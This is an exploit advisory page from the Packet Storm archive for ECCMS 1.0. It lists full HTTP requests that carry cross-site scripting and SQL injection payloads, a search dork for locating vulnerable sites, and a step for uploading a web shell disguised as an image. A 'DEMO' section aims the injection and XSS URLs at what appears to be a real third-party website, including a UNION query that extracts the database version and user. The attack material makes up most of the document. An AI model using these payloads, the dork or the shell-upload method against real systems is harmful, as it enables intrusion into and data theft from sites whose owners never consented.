exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

ECCMS 1.0 Cross Site Scripting / SQL Injection

ECCMS 1.0 Cross Site Scripting / SQL Injection
Posted Mar 2, 2015
Authored by R3VAN_BASTARD

ECCMS version 1.0 suffers from cross site scripting and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, xss, sql injection
SHA-256 | 9eeb234bbd8787625b39c3f09b64e83fd61a9ce1aa037d29a827c35e31e2de3b

ECCMS 1.0 Cross Site Scripting / SQL Injection

Change Mirror Download
=====================================================================
Advisory: ECCMS 1.0 - Multiple Vulnerabilities
Author: R3VANBASTARD - Yogyakarta
Dork: "Powered by Econnective" / Powered by Econnective inurl:/admin
=====================================================================

Vulnerability Details:

1.) XSS
Request
GET /announcement.php?consist=1&id=3%27%22%28%29%26%25%3cScRiPt%20%3eprompt%28950843%29%3c%2fScRiPt%3e&page=2 HTTP/1.1
Referer: http://www.localhost.com/
Cookie: PHPSESSID=lcsefqdvchidhirh14ss7dujd3
Host: www.kingarms.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*

GET /download_catalog.php/--%3E1%3CScRiPt%3Eprompt(994458)%3C/ScRiPt%3E%3C!-- HTTP/1.1
Referer: http://www.localhost.com/
Cookie: PHPSESSID=lcsefqdvchidhirh14ss7dujd3
Host: www.kingarms.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*

2.) Blind SQLi
Request
GET /product_shop.php?cate=-1%22%20or%20%22102%22%3d%22101&country=Angola&formcountry=search&id=0 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.localhost.com/
Cookie: PHPSESSID=lcsefqdvchidhirh14ss7dujd3
Host: www.kingarms.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*

Request
GET /just_in.php?consist=1&id=-1%20or%2011%3d9&page=2 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.localhost.com/
Cookie: PHPSESSID=lcsefqdvchidhirh14ss7dujd3
Host: www.kingarms.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*

3.) SQLi
GET /product_shop.php?cate=all&country=United%20States&formcountry=search&id=%28select%201%20and%20row%281%2c1%29%3e%28select%20count%28*%29%2cconcat
%28concat%28CHAR%2852%29%2cCHAR%2867%29%2cCHAR%28117%29%2cCHAR%28112%29%2cCHAR%2856%29%2cCHAR%2883%29%2cCHAR%28120%29%2cCHAR%2870%29%2cCHAR%28114%29%2c
CHAR%2882%29%2cCHAR%2856%29%29%2cfloor%28rand%28%29*2%29%29x%20from%20%28select%201%20union%20select%202%29a%20group%20by%20x%20limit%201%29%29 HTTP/1.1
Cookie: PHPSESSID=lcsefqdvchidhirh14ss7dujd3
Host: http://www.localhost.com/
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*

4.) UPLOAD SHELL
Login into admin panel then upload your shell .JPG
http://localhost/upload/banner/file_photo_00088_1421635224.jpg.php


5.) DEMO
http://www.kingarms.com//download_catalog.php/--%3E1%3CScRiPt%3Eprompt%285050515%29%3C/ScRiPt%3E%3C!--
http://www.kingarms.com/product_detail.php?id=35%27+union+all+select+1,2,3,4,5,6,7,version%28%29,user%28%29,10,11,12,13,14,15,16,17,18,19,20,21%20and%20%270%27=%270--

===============================================
Thanks to:
- Research And Development Center (RNDC.or.id)
- Yoga0400
===============================================
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close